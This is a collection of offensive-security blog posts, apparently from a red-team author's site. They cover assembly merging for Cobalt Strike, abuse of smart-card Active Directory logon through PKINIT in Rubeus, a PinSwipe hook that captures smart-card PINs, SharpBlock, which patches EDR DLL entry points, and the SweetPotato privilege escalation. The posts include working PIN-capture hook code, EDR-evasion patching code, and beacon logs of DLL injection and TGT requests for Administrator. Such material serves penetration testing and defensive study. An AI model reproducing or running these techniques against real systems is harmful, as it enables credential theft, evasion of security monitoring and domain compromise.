Merging C# Assemblies using dnMerge


When it comes to automating builds for any project that I undertake, my go-to OS is usually Linux. Generally I find Linux build nodes easier to deploy and manage, and usually cheaper than their Windows counterparts. The problem with this, of course, is that Windows based software generally needs cross-compiling in some way or another. For C/C++ based tooling my go-to build system is CMake and MinGW, which makes cross-compiling for Windows relatively easy.

When it comes to building C# tools on Linux we have the ability to use the dotnet core SDK. With the release of the Microsoft.NETFramework.ReferenceAssemblies NuGet package, targeting most legacy .NET Framework versions is a breeze. A quick dotnet msbuild invocation within your C# project directory will generally yield executables that run on Windows against the older framework versions, as opposed to the newer .NET Core technology stack.

Unfortunately things start to fall apart when it comes to offensive C# tooling. With the ability to load and execute .NET assemblies through C2 frameworks such as Cobalt Strike, compilation usually involves the step of merging dependent assemblies into a monolithic exe ready for execution. Up until recently, my preference was to use Costura. Costura is a Fody extension that compresses and merges assemblies inside the main executable, then uncompresses and loads them from memory on demand during execution. That’s great, so what’s the problem? Since Costura is a build time dependency, on Linux it is executed under .NET Core during the build process. The net effect of this is that additional .NET Core references get pulled into your final assembly, and commands such as execute-assembly will no longer work with assemblies cross-compiled from Linux due to the added .NET Core assembly references.

dnMerge Primer

I had a play around with MSBuild and developed a new build plugin called dnMerge. It works exactly like Costura, where reference assemblies are compressed and merged during compilation, but with the added benefit of retaining execute-assembly support when cross-compiling on Linux. Another benefit of dnMerge over Costura is the use of the LZMA compression algorithm over the traditional deflate algorithm used by Costura. When using Costura, a simple C# program with dependencies on cobbr’s (and other contributors) amazing SharpSploit library will result in a merged executable file a touch over 1MB. This eliminates the possibility of using execute-assembly inside Cobalt Strike due to the 1MB hard limit on a single data transfer. With dnMerge the same project results in an executable size of around 800K, which is usable with Cobalt Strike’s execute-assembly.

Using dnMerge in your project is as easy as adding the NuGet package from the central repo. Debug builds are left alone and unmerged to allow easy debugging, but release builds will automatically compress and merge dependent assemblies ready for use with execute-assembly.

Below is a quick Microsoft SDK project template to get you started that can be used to build within Visual Studio or the dotnet Core SDK on Linux. Alternatively, add the dnMerge NuGet package to your project and build.

I have been using dnMerge for a couple of months now, and it is also used for merging assemblies for BOF.NET. But if you do encounter any problems using it within your own project, please let me know by creating an issue on GitHub.


<Project Sdk="Microsoft.NET.Sdk">

  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net45</TargetFramework>
  </PropertyGroup>

  <ItemGroup>
    <PackageReference Include="dnMerge" Version="0.5.13">
      <PrivateAssets>all</PrivateAssets>
      <IncludeAssets>runtime; build; native; contentfiles; analyzers; buildtransitive</IncludeAssets>
    </PackageReference>
    <PackageReference Include="Microsoft.NETFramework.ReferenceAssemblies" Version="1.0.2">
      <PrivateAssets>all</PrivateAssets>
      <IncludeAssets>runtime; build; native; contentfiles; analyzers</IncludeAssets>
    </PackageReference>
  </ItemGroup>

  <PropertyGroup Condition="'$(Configuration)|$(TargetFramework)|$(Platform)'=='Release|net45|AnyCPU'">
  </PropertyGroup>

  <PropertyGroup Condition="'$(Configuration)|$(TargetFramework)|$(Platform)'=='Debug|net45|AnyCPU'">
  </PropertyGroup>

</Project>


The full project source can be found on my GitHub repo.


dnMerge uses the brilliant dnlib library for .NET assembly modifications. Without this library dnMerge would not be possible.

7-Zip’s LZMA SDK is used for compressing and uncompressing merged assemblies.

Attacking Smart Card Based Active Directory Networks


Recently I was involved in an engagement where I was attacking a smart card based Active Directory network. The fact is, though, you don’t need a physical smart card at all to authenticate to an Active Directory that enforces smart card logon. The attributes of the certificate determine whether it can be used for smart card based logon, not the origin of the associated private key. So if you have access to the corresponding private key, smart card logon can still be achieved.

When a user has been enrolled for smart card based login, in its default configuration the domain controller will accept any certificate signed by its trusted certificate authority that meets the following specification:

  • CRL Distribution Point must be populated, online and available
  • Key Usage for the certificate is set to Digital Signature
  • Enhanced Key Usages:
    • Smart Card Logon
    • Client Authentication (Optional, used for SSL based authentication)
  • Subject Alternative Name containing the user’s UPN
  • Fully distinguished AD name of the user as the Subject
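As a rough illustration, the requirements above map onto an OpenSSL extension section like the sketch below. This is a hypothetical fragment, not taken from any real CA: the section name, CRL URL and UPN are placeholders, while the Microsoft OIDs for the Smart Card Logon EKU (1.3.6.1.4.1.311.20.2.2) and the UPN otherName SAN (1.3.6.1.4.1.311.20.2.3) are the parts that matter.

```ini
# Hypothetical extension section for an openssl req/x509 invocation.
# URL and UPN below are placeholders, not values from a real environment.
[ smartcard_ext ]
keyUsage = digitalSignature
# Client Authentication (optional) plus Smart Card Logon
extendedKeyUsage = clientAuth, 1.3.6.1.4.1.311.20.2.2
# The user's UPN travels in a SAN otherName entry
subjectAltName = otherName:1.3.6.1.4.1.311.20.2.3;UTF8:administrator@hacklab.local
# Must point at a CRL the domain controller can actually reach
crlDistributionPoints = URI:http://pki.hacklab.local/ca.crl
```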

Additionally, if the Allow certificates with no extended key usage certificate attribute group policy is enabled, the enhanced key usages don’t need to be present at all. This can lead to the abuse of other types of certificates issued to domain users or computers. Check out the post from CQURE Academy on how this policy can be abused.

Typical certificate capable of PKI/smart card login

This is where this particular journey of mine began: how can we take leaked private keys or physical smart card PINs and use them to our advantage?


As many of you are aware, modern day Active Directory uses Kerberos for authenticating to the domain. Tools like Rubeus, Mimikatz, Kekeo and impacket can be used to abuse Kerberos to the attacker’s advantage.

So where does PKI based authentication fit in with Kerberos? Back in 2006, a combined effort between Microsoft and the Aerospace Corporation submitted RFC 4556. This introduced public key cryptography support for Kerberos pre-authentication.

Pre-authentication is Kerberos’s answer to offline brute force attacks on an account password. Without pre-authentication enabled on an AD account, users are vulnerable to AS-REP roasting attacks. With pre-authentication, the initial AS-REQ Kerberos request contains an encrypted timestamp. The key used to encrypt it is derived from the user’s password, which proves to the KDC that the user requesting the login knows the account password. The KDC is therefore happy to send back an encrypted AS-REP (the response to the AS-REQ) tied to the user’s password. The fact that the pre-auth data contains a timestamp also prevents replay attacks. If the pre-authentication data is not valid, the KDC returns an error, and no brute forcing of the AS-REP response key is possible. If an attacker is suitably placed within a network to spy on Kerberos responses, though, AS-REP roasting is still possible.

PKI based authentication works in a similar fashion. It uses Kerberos pre-authentication to prove the user is who they say they are. Again, this uses a timestamp, but instead of encrypting the message with the user’s password-derived key, it signs the message in the form of a PKCS #7 Cryptographic Message Syntax (CMS) payload using the private key belonging to the certificate. This private key can be present on a physical smart card, or it can be stored in other, not so secure, forms too. Once the KDC validates the signature of the CMS payload and everything checks out, an AS-REP is sent back to the client. One final detail of PKINIT is the encryption used for the AS-REP response. Because no password is used during a PKI based Kerberos login, the user’s key is unknown to the client. To combat this, the AS-REP is either encrypted using a key obtained via the Diffie-Hellman key exchange algorithm, or it is encrypted with the public key of the certificate used in the initial AS-REQ request. The initial request contains the details of which method is preferred.

From here on out, everything else remains the same. The client will have a valid TGT that can be used to request TGS tickets. The certificate is no longer used for the lifetime of the TGT, which will generally remain valid for 7 days before the certificate’s private key is needed again. That’s not to say the private key goes unused for those 7 days during Windows logon: if the machine is locked or a user has logged out, Windows will enforce a fresh authentication just as it does with a password based login. But from an attacker’s perspective, this is irrelevant once they have obtained a TGT.

More in depth details on interactive and network based logon using smart cards can be found from the MS-PKCA documentation.

Rubeus with PKINIT

So I started working on adding PKINIT support to Rubeus and created a pull request. I have to give a big shout out to the Kerberos king @SteveSyfuhs. Kerberos.NET was a massive help when trying to understand the inner workings of PKINIT, and some modified code worked its way into Rubeus. Also a tip of the hat to @gentilkiwi for Kekeo/Mimikatz and to @harmj0y and the other Rubeus contributors. I wouldn’t have such a great tool to start with in the first place if it wasn’t for their hard work.

PKCS#12 Based Authentication (PFX)

The first attack scenario I’ll cover is the exposure of a user’s private key. We can use a PKCS#12 certificate store, which contains a user’s certificate along with the corresponding private key, to generate a Kerberos TGT. Generating the pfx will depend on how you have managed to expose the private key in the first place. You can use OpenSSL to generate a PKCS#12 store once you have the private key blob and corresponding certificate like this:

openssl pkcs12 -export -out leaked.pfx -inkey privateKey.key -in certificate.crt 

Once you have generated a valid certificate store, we can use the new addition to Rubeus to request a TGT. If you decide to protect the certificate store with a password, you can add the /password option to the command line.

Rubeus.exe asktgt /user:Administrator /certificate:leaked.pfx /domain:hacklab.local /dc:dc.hacklab.local

Rubeus will then generate a PKINIT based AS-REQ using the supplied certificate store to authenticate the user. If everything checks out and the KDC is happy you should get something similar to this:

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Administrator, CN=Users, DC=hacklab, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'hacklab.local\Administrator'
[+] TGT request successful!
[*] base64(ticket.kirbi):
  ServiceName           :  krbtgt/hacklab.local
  ServiceRealm          :  HACKLAB.LOCAL
  UserName              :  Administrator
  UserRealm             :  HACKLAB.LOCAL
  StartTime             :  02/10/2020 16:01:12
  EndTime               :  03/10/2020 02:01:12
  RenewTill             :  09/10/2020 16:01:12
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType               :  rc4_hmac
  Base64(key)           :  6tIiFytU5V2cgSpXt8skdw==

The resulting Base64 encoded .kirbi string can then be used for obtaining TGSs from the KDC as normal.

Physical Smart Card Login

After I managed to get PKINIT working with a certificate store, it got me thinking about how we could use a physical smart card too. The main obstacle to using smart cards once a user’s machine is compromised is of course the PIN. Without knowing the PIN we cannot generate a valid AS-REQ. Brute forcing is out of the question, since three invalid attempts will lock the card.

One option is to capture the PIN when a user is required to unlock the smart card. This could be for a machine unlock/login, website login or other services on the network that requires smart card authentication.

After a little investigation this led me to the WinSCard DLL. This DLL is the gateway to communicating with the Smart Card service. The service then controls the resources and communication with the smart cards themselves. Generally, anything that communicates with a smart card on Windows will use the WinSCard API. This includes LSASS during login and the Internet Explorer / Edge browser when authenticating to websites that require smart card authentication.

The specific export from the WinSCard.dll that interested me was the SCardTransmit API. This is the API used to transmit what the smart card ISO/IEC 7816 specification calls an Application Protocol Data Unit (APDU). This is the lowest level transmission unit that is used to communicate with a smart card.

Command APDU

  • CLA (1 byte) – Instruction class: indicates the type of command, e.g. interindustry or proprietary
  • INS (1 byte) – Instruction code: indicates the specific command, e.g. “write data”
  • P1-P2 (2 bytes) – Instruction parameters for the command, e.g. offset into file at which to write the data
  • Lc (0, 1 or 3 bytes) – Encodes the number (Nc) of bytes of command data to follow: 0 bytes denotes Nc=0; 1 byte with a value from 1 to 255 denotes Nc with the same value; 3 bytes, the first of which must be 0, denote Nc in the range 1 to 65 535
  • Command data (Nc bytes) – Nc bytes of data
  • Le (0, 1, 2 or 3 bytes) – Encodes the maximum number (Ne) of response bytes expected: 0 bytes denotes Ne=0; 1 byte in the range 1 to 255 denotes that value of Ne, with 0 denoting Ne=256; 2 bytes (if extended Lc was present in the command) in the range 1 to 65 535 denotes Ne of that value, with two zero bytes denoting 65 536; 3 bytes (if Lc was not present in the command), the first of which must be 0, denote Ne in the same way as a two-byte Le

Response APDU

  • Response data (Nr bytes, at most Ne) – Response data
  • Response trailer (SW1-SW2, 2 bytes) – Command processing status, e.g. 90 00 (hexadecimal) indicates success
APDU Structure from Wikipedia

If we hook this API, then we should be able to spy on APDUs transmitted to the card.

LONG SCardTransmit(
  SCARDHANDLE          hCard,
  LPCSCARD_IO_REQUEST  pioSendPci,
  LPCBYTE              pbSendBuffer,
  DWORD                cbSendLength,
  LPSCARD_IO_REQUEST   pioRecvPci,
  LPBYTE               pbRecvBuffer,
  LPDWORD              pcbRecvLength
);

The pbSendBuffer parameter contains the APDU packet that is making its way to the card, and pbRecvBuffer will contain the response from the smart card.

Whilst the ISO smart card specification has recommendations for certain command classes and command data structures, these are generally application specific and not defined by the ISO smart card specification itself. So where do we look for answers now? For identity and access purposes NIST produced the Personal Identity Verification (PIV) SP 800-73-4 specification. Without going into too much detail, the specification covers how the smart card should handle certificates enrolled onto the device, along with all the APDUs needed to implement the specification. The area of interest within the PIV specification is section 3.2.1, VERIFY Card Command. This section describes how the VERIFY APDU is used to validate the PIN prior to allowing access to private keys stored on the card.

So, armed with the information from the ISO specification along with section 3.2.1 from the PIV specification, we should be able to produce a reliable hook to capture a PIN transmitted to the card. I covered API hooking in my EDR series of blog posts, so the methods used here are the same. Here is the implementation of the hooked API.

LONG WINAPI HookedSCardTransmit(SCARDHANDLE hCard,
	LPCSCARD_IO_REQUEST pioSendPci,
	LPCBYTE             pbSendBuffer,
	DWORD               cbSendLength,
	LPSCARD_IO_REQUEST  pioRecvPci,
	LPBYTE              pbRecvBuffer,
	LPDWORD             pcbRecvLength) {

	char debugString[1024] = { 0 };

	//Call the real SCardTransmit first so we can inspect the card's response too
	LONG result = pOriginalpSCardTransmit(hCard, pioSendPci, pbSendBuffer, cbSendLength, pioRecvPci, pbRecvBuffer, pcbRecvLength);

	//Check for CLA 0, INS 0x20 (VERIFY) and P1 of 00/FF according to NIST.SP.800-73-4 (PIV) specification
	if (cbSendLength >= 13 && pbSendBuffer[0] == 0 && pbSendBuffer[1] == 0x20 && (pbSendBuffer[2] == 0 || pbSendBuffer[2] == 0xff)) {

		//Check card response status for success (SW1 SW2 == 90 00)
		bool success = false;
		if (pbRecvBuffer[0] == 0x90 && pbRecvBuffer[1] == 0x00) {
			success = true;
		}

		//PIN digits start at offset 5 (command data); length comes from Lc at offset 4
		char asciiPin[9];
		sprintf_s(debugString, sizeof(debugString), "Swipped VERIFY PIN: Type %s, Valid: %s, Pin: %s", GetPinType(pbSendBuffer[3]), success ? "true" : "false",
			GetPinAsASCII(pbSendBuffer + 5, min(pbSendBuffer[4], 8), asciiPin));

		//debugString is then written to the named pipe for PinSwipeListener (omitted here)
	}

	return result;
}

The first thing the hooked API does is call the original SCardTransmit function. Not only are we interested in the request, we also want to know the response from the card; this way we can determine whether the PIN transmitted to the card was correct too. The function then looks for the VERIFY APDU to isolate commands specific to verifying the PIN. Once we have determined a VERIFY command is in progress we check the result; 0x90 0x00 signifies the PIN was validated correctly. Next, we extract the PIN from the send buffer at offset 5 (the command data within the APDU structure). Finally, we transmit the PIN details over a named pipe ready for capture by a receiving application interested in the data.

Packaging this functionality into a DLL that is also capable of being reflectively loaded will allow the DLL to be injected into our process of interest without hitting the disk. You can find the complete PinSwipe project on my GitHub repo, which also includes a .NET PinSwipeListener console app that will list certificates found with the Smart Card Logon Enhanced Key Usage attribute, then set up a listening pipe to capture swiped PINs.


In this assumed breach scenario I already have a Cobalt Strike beacon connected to a victim workstation. I am using an Administrator account but a limited account will work too. The PinSwipe DLL can be injected into a high privilege process like lsass when Administrative access is obtained which enables swiping PINs during login, but with limited user level access you will be restricted to injecting into user mode processes like Internet Explorer etc…

So first of all let’s launch PinSwipeListener, this will dump out certificate information for user certificates that have the Smart Card Logon EKU.

beacon> execute-assembly C:\tools\PinSwipeListener.exe
[*] Tasked beacon to run .NET program: PinSwipeListener.exe
[+] host called home, sent: 112171 bytes
[+] received output:
[+] Found smart card logon certificate with thumbprint 55C65AB0B9B6A893A6E8449FB34DD61093B231D8 and subject CN=Administrator, CN=Users, DC=hacklab, DC=loca

With the listener now in place, we need to choose which processes to inject PinSwipe.dll into. Targets like Internet Explorer, Chrome etc. are good choices, since these will regularly pop up requesting PINs in a smart card authenticated environment. For the demo I was running Internet Explorer under PID 2678. I should note that IE, like Chrome, launches child processes for the various tabs in use, so you’ll need to inject into the correct process. More advanced aggressor scripts could continually look out for new IE processes and inject into them all, but I will leave that as an exercise for the reader.

beacon> dllinject 2678 C:\tools\PinSwipe.dll
[*] Tasked beacon to inject C:\tools\PinSwipe.dll into 2678

Once a user enters their PIN into the dialog, PinSwipe should do its thing and capture the request and send it over the named pipe to PinSwipeListener.

IE presenting PIN dialog for end user
[+] received output:
[+] PinSwipe: Swipped VERIFY PIN: Type PIV Card Application, Valid: true, Pin: 123456

The output from PinSwipe will indicate whether the entered PIN was correct, in addition to the PIN itself. Once you have captured the PIN you can use the new Rubeus feature to request a TGT using the user’s physical smart card. This time the /certificate parameter will reference the thumbprint or subject name of the certificate to use, not a pfx file like in the first demo. The output from PinSwipeListener will help when supplying this argument.

beacon> execute-assembly C:\tools\Rubeus.exe asktgt /user:Administrator /domain:hacklab.local /dc: /certificate:55C65AB0B9B6A893A6E8449FB34DD61093B231D8 /password:123456
[*] Tasked beacon to run .NET program: Rubeus.exe asktgt /user:Administrator /domain:hacklab.local /dc: /certificate:55C65AB0B9B6A893A6E8449FB34DD61093B231D8 /password:123456
[+] host called home, sent: 357691 bytes
[+] received output:
   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/
[*] Action: Ask TGT
[+] received output:
[*] Using PKINIT with etype rc4_hmac and subject: CN=Administrator, CN=Users, DC=hacklab, DC=local 
[*] Building AS-REQ (w/ PKINIT preauth) for: 'hacklab.local\Administrator'
[+] received output:
[+] TGT request successful!
[+] received output:
[*] base64(ticket.kirbi):
  ServiceName           :  krbtgt/hacklab.local
  ServiceRealm          :  HACKLAB.LOCAL
  UserName              :  Administrator
  UserRealm             :  HACKLAB.LOCAL
  StartTime             :  04/10/2020 19:55:29
  EndTime               :  05/10/2020 05:55:29
  RenewTill             :  11/10/2020 19:55:29
  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType               :  rc4_hmac
  Base64(key)           :  5K2V8xIaGbUS8ZYqTl120Q==

That is it. You now have a TGT that can be used for 7 days to request new TGS tickets for accessing other network resources.

Final Notes

When using physical smart cards within your network, it’s always a good idea to have cards that require a physical press of a button, or better still a biometric reader. That way, any compromise of a user’s account will not lead to generating TGTs, since the smart card will prevent access to the private keys without the physical button press or biometric data being present.



Let’s Create An EDR… And Bypass It! Part 2

In part one of this series we created a basic active protection EDR that terminated any program that changed memory protection to RWX. This was accomplished by hooking the VirtualProtect API and monitoring for the RWX memory protection flags. Check out part 1 of this series for a more detailed description of how this was done.

In part 2 I’m going to cover some bypass methods that I have seen others document and then demonstrate another method along with accompanying code.

OK, so with the introduction out of the way, let’s look at the bypass methods currently in use and the pros and cons of each.

Blending in

The simplest of the methods doesn’t involve any magic at all and is all about blending in. The EDR hooks remain in place but don’t alert on any suspicious activity due to the implementation of the malware. A good example of bypassing our EDR from part 1 would be to ensure that you never change or allocate memory as RWX. If you need to allocate new code or update existing code, use RW mode first, then change to RX once the update is complete. If the code has no option but to behave in suspicious ways, it’s time to look at bypass methods.


Unhooking

Unhooking the hooked API calls is another option. This involves reversing the operation that EDRs perform when patching the hooked APIs. Generally this means loading a clean copy of the hooked DLLs from disk and overwriting the hooked functions’ code, typically only 5 bytes per hooked function. There are a few examples of how this can be done. Unhooking could potentially be detected by EDRs during this process.

Direct syscall instructions

By far the most effective solution is direct syscall instructions. Here the malware does not call the APIs themselves but implements the same stub code that the lowest level API calls execute prior to transferring to kernel mode. Since no API calls are made prior to hitting kernel code, the EDR is blind to these types of calls. This is because EDRs generally implement their active protection in-process within userland code, which is inherently their weakness.

Direct syscall bypass comes at a price though. It’s by far the hardest to get right and the most verbose in code terms. Since direct syscalls are utilising the lowest level of API’s there is a ton of boilerplate needed for some functions to be called correctly. Let’s take the higher level CreateProcess API. If you wanted to create a process using syscalls only, you probably need to implement somewhere in the region of 20-30 syscall implementations. Take a look at ReactOS’s implementation of CreateProcessInternal if you don’t believe me.

Other complications come from using direct syscalls in 32-bit processes running on 64-bit Windows. 32-bit programs actually switch to 64-bit prior to making the syscall, and back again when returning from kernel land. Syscall indexes can also change between versions of Windows. Syscalls are implemented using a table within the kernel, with an index used to reference a particular syscall. This index can change, so again, something that needs to be considered.

I have seen some excellent work in this area recently that makes the process easier. Here are some great examples

Microsoft Signed DLL Process Mitigation Policy

Another method of bypassing EDRs can be achieved by enabling the Microsoft Signed DLL Process Mitigation Policy. Wow, that’s a mouthful. The policy is designed to prevent any DLL that is not signed by Microsoft from loading into any process where the policy is enabled. This prevents EDRs that have not been signed or cross-signed by Microsoft from loading into the process. This method has been covered elsewhere and is in fact the same solution implemented by Cobalt Strike’s blockdlls command. The policy can be enabled in-process, but it does not remove DLLs that have already been loaded. This generally means it’s only effective on child processes created by your malware. It’s a simple solution to implement, but all bets are off if the EDR’s active protection DLL is cross-signed by Microsoft, or if Microsoft themselves implement active protection EDR within the likes of Windows Defender ATP. The policy will also prevent the malware from loading other non-Microsoft DLLs that it may need to function.


Now that we have covered many of the EDR bypass solutions in use today, I’d like to introduce SharpBlock. It’s just another method that I thought could be used for bypassing EDRs and that I don’t think I’ve seen used before (please let me know if you do find something).

SharpBlock can be used to launch a child process and prevent a specific DLL from hooking into it. Since it targets specific DLLs, other DLLs are still allowed to load into the process.

How does it work?

When SharpBlock spawns the requested child process, it uses the Windows Debug API to listen for debug events during the lifecycle of the child process. When a process is being debugged, the parent debugger process will receive these events, and the child process is paused while each event is handled. The fact that the child process is paused during these events is a key element of why this method works. So what events are fired when debugging a process?

CREATE_PROCESS_DEBUG_EVENT – Fired on initial process creation, including child processes.
CREATE_THREAD_DEBUG_EVENT – Fired when a new thread is created.
EXCEPTION_DEBUG_EVENT – Fired when an exception occurs.
EXIT_PROCESS_DEBUG_EVENT – A process has exited, including a child process.
EXIT_THREAD_DEBUG_EVENT – A thread has exited.
LOAD_DLL_DEBUG_EVENT – A DLL has loaded within a process or one of its children.
OUTPUT_DEBUG_STRING_EVENT – Debug strings written using the OutputDebugString API.
UNLOAD_DLL_DEBUG_EVENT – A DLL has unloaded within the debugged process or its children.
Debug Events

As I’m sure you have guessed by now, the particular event we are interested in is LOAD_DLL_DEBUG_EVENT. When a debugged process or one of its children loads a DLL, we want to know about it.

Once we receive the event and determine it’s a DLL we would like to block, how do we actually block its behavior? Well, let’s revisit our DLL entry point from our uber cool EDR, SylantStrike.

BOOL APIENTRY DllMain(HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved) {

    switch (ul_reason_for_call) {
    //We are not interested in callbacks when a thread is created
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    case DLL_PROCESS_ATTACH: {
        //We need to create a thread when initialising our hooks since
        //DllMain is prone to lockups if executing code inline.
        HANDLE hThread = CreateThread(nullptr, 0, InitHooksThread, nullptr, 0, nullptr);
        if (hThread != nullptr) {
            CloseHandle(hThread);
        }
        break;
    }
    }
    return TRUE;
}

What if we change the entry point’s behavior to the equivalent of this code?

BOOL APIENTRY DllMain(HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved) {
    return TRUE;
}

If we patch the code at runtime to essentially implement this behavior, the InitHooksThread function is never called, and ergo the hooks are never put in place. We can accomplish this with the 0xC3 opcode, which translates to the x86/x64 ret instruction. If we patch the beginning of the entry point function with 0xC3, we get the desired effect. Before we can patch the entry point though, we need to figure out where it is.

            PE.IMAGE_DOS_HEADER dosHeader = (PE.IMAGE_DOS_HEADER)Marshal.PtrToStructure(mem, typeof(PE.IMAGE_DOS_HEADER));
            PE.IMAGE_FILE_HEADER fileHeader = (PE.IMAGE_FILE_HEADER)Marshal.PtrToStructure( new IntPtr(mem.ToInt64() + dosHeader.e_lfanew) , typeof(PE.IMAGE_FILE_HEADER));

            UInt16 IMAGE_FILE_32BIT_MACHINE = 0x0100;
            IntPtr entryPoint;

            if ( (fileHeader.Characteristics & IMAGE_FILE_32BIT_MACHINE) == IMAGE_FILE_32BIT_MACHINE) {
                PE.IMAGE_OPTIONAL_HEADER32 optionalHeader = (PE.IMAGE_OPTIONAL_HEADER32)Marshal.PtrToStructure
                    (new IntPtr(mem.ToInt64() + dosHeader.e_lfanew + Marshal.SizeOf(typeof(PE.IMAGE_FILE_HEADER))), typeof(PE.IMAGE_OPTIONAL_HEADER32));

                entryPoint = new IntPtr(optionalHeader.AddressOfEntryPoint + imageBase.ToInt32());

            } else {
                PE.IMAGE_OPTIONAL_HEADER64 optionalHeader = (PE.IMAGE_OPTIONAL_HEADER64)Marshal.PtrToStructure
                    (new IntPtr(mem.ToInt64() + dosHeader.e_lfanew + Marshal.SizeOf(typeof(PE.IMAGE_FILE_HEADER))), typeof(PE.IMAGE_OPTIONAL_HEADER64));

                entryPoint = new IntPtr(optionalHeader.AddressOfEntryPoint + imageBase.ToInt64());
            }
The code above analyses the PE header of the DLL that is in the process of being loaded to find out where the DLL’s entry point resides. I should note that the DLL entry point does not actually point to DllMain, but usually to the C runtime initialiser that will eventually call DllMain. But for all intents and purposes we’ll call it DllMain.

Once we have calculated the final address of the entry point, we can use the WriteProcessMemory API call to overwrite the entry point with the ret instruction.

                Console.WriteLine("[+] Patching DLL Entry Point at 0x{0:x}", entryPoint.ToInt64());

                if (PInvokes.WriteProcessMemory(hProcess, entryPoint, retIns, 1, out bytesWritten)) {
                    Console.WriteLine("[+] Successfully patched DLL Entry Point");
                } else {
                    Console.WriteLine("[!] Failed to patch DLL Entry Point");
                }

Finally, we can allow the process to continue on its merry way without the EDR hooks being applied.



SharpBlock by @_EthicalChaos_
  DLL Blocking app for child processes

  -e, --exe=VALUE            Program to execute (default cmd.exe)
  -a, --args=VALUE           Arguments for program (default null)
  -n, --name=VALUE           Name of DLL to block
  -c, --copyright=VALUE      Copyright string to block
  -p, --product=VALUE        Product string to block
  -d, --description=VALUE    Description string to block
  -h, --help                 Display this help

SharpBlock will default to launching cmd.exe without any arguments, but this can be overridden with the -e and -a arguments respectively. The remaining arguments can be specified multiple times to block any DLL by its name on disk, or by the copyright, product or description values within its version info. A DLL's version info can be found in the Details tab when viewing the file's properties from Explorer.

Going back to our example EDR from part one, this time we load notepad.exe using SharpBlock.

SharpBlock.exe -e c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike"

The SylantStrikeInject process will then detect the launch of notepad and attempt to load the active protection DLL.

SylantStrikeInject.exe -p notepad.exe -d C:\tools\SylantStrike.dll
Waiting for process events
Listening for the following processes: notepad.exe 

+ Injecting process notepad.exe(6784) with DLL C:\tools\SylantStrike.dll

But this time, SharpBlock detects the loaded DLL from the description field of SylantStrike.dll's version info and patches the entry point.

SharpBlock by @_EthicalChaos_
DLL Blocking app for child processes

[+] Launched process c:\windows\system32\notepad.exe with PID 6784
[+] Blocked DLL C:\tools\SylantStrike.dll
[+] Patching DLL Entry Point at 0x7ffd89932c74
[+] Successfully patched DLL Entry Point

Attempting to inject our shellcode from part 1 using Cobalt Strike results in the successful launch of calc and cmd, and is not blocked by SylantStrike's active DLL protection.

shinject 6784 x64 C:\Tools\SylantStrike\loader.bin

If you are interested in giving it a go, head over to the SharpBlock project on GitHub


Sweet Potato

SweetPotato – Local Service to SYSTEM

I have had a keen interest in the original RottenPotato and JuicyPotato exploits that utilize DCOM and NTLM reflection to perform privilege escalation to SYSTEM from service accounts. These tools work by leveraging SeImpersonatePrivilege and a man-in-the-middle (MITM) server to escalate privileges when a high privilege process connects to the MITM server running on the same machine.

I won't dive into too much detail since the method has been covered extensively by Fox Glove Security and Decoder's Potatoes and tokens blog.

In the interest of expanding my knowledge on the subject I decided to rewrite JuicyPotato in C#. In addition to the original JuicyPotato functionality I also added an additional PrivEsc that decoder and a few others had found with the BITS service. When instantiating a BITS COM object, if the service is not running, COM will start the service on behalf of the user requesting the COM object. On startup, the BITS service attempts to connect to the local WinRM service on port 5985. If WinRM is not active, we can set up a server listening on port 5985 and force the BITS service running as SYSTEM to perform local NTLM authentication, which we can then impersonate. Further details about the discovery can be found on decoder's blog here


The tool was designed to be used with Cobalt Strike's execute-assembly command, so it carries no baggage in the form of dependencies. A release build is around 70KB in size and works for both 32-bit and 64-bit processes. Since the original DCOM vulnerability that Rotten/JuicyPotato exploits is fixed in Windows 10 1809+ and Windows Server 2019, the tool should automatically switch to the BITS/WinRM exploit described above. So to recap:

  • Works on Windows 7 up to the latest version of Windows 10 and Server 2019
  • Compatible with execute-assembly from Cobalt Strike and other C2 projects that support in memory execution of .NET executables
  • Works on 32 bit and 64 bit operating systems.
  • Can be compiled for .NET 2 and 4 depending on target OS.
  • Automatically attempts the correct exploit to execute.

If you are interested in trying it out, head over to the GitHub project here


The tool should work on all flavors of Windows but will only work when executed from a process with impersonate privileges. These are typically given to services, which can be running as a low privilege account such as Network Service. Additionally, for the exploit to work on the latest Windows 10 or Windows Server 2019, WinRM must not be enabled. WinRM is disabled by default on Windows 10, but enabled by default on Windows Server 2019.


Huge shout out to @decoder_it and @Giutro for JuicyPotato which SweetPotato is heavily based upon and of course @foxglovesec for the original RottenPotato code.

Weaponizing your favorite Go program for Cobalt Strike


There are a myriad of ways currently to weaponize various offsec tools for use within Cobalt Strike. Many of these methods remain undetectable by modern day AV and EDR engines. Anything from in-memory PowerShell execution to using the execute-assembly command to run your latest SharpXXX .NET binary completely from memory.

Recently I have noticed an increase in the use of Golang for writing many offsec tools. Why? Well personally I put it down to the ease of compiling on Windows, Linux and dare I say macOS. In addition to ease of compiling, Golang can produce monolithic binaries that have no dependencies whatsoever, other than the DLLs or shared objects that are distributed as part of the operating system. The drawback of this of course is fairly large binaries. A simple hello world program with Go 1.7+ comes in at around 1MB after stripping debug symbols. Once you start throwing in imports of 3rd party libraries this can easily reach 8MB and beyond.

So with the single monolithic binary in mind, I started looking at how a Go program can be weaponized for offsec purposes within Cobalt Strike. Cobalt Strike and metasploit have the capability of reflectively loading a DLL and executing it directly from memory. I won’t cover reflective loading here, since there are plenty of write-ups already on the subject, but if you are interested, head over to Stephen Fewer’s ReflectiveDLLInjection project which is one of the originals that many are based on today.


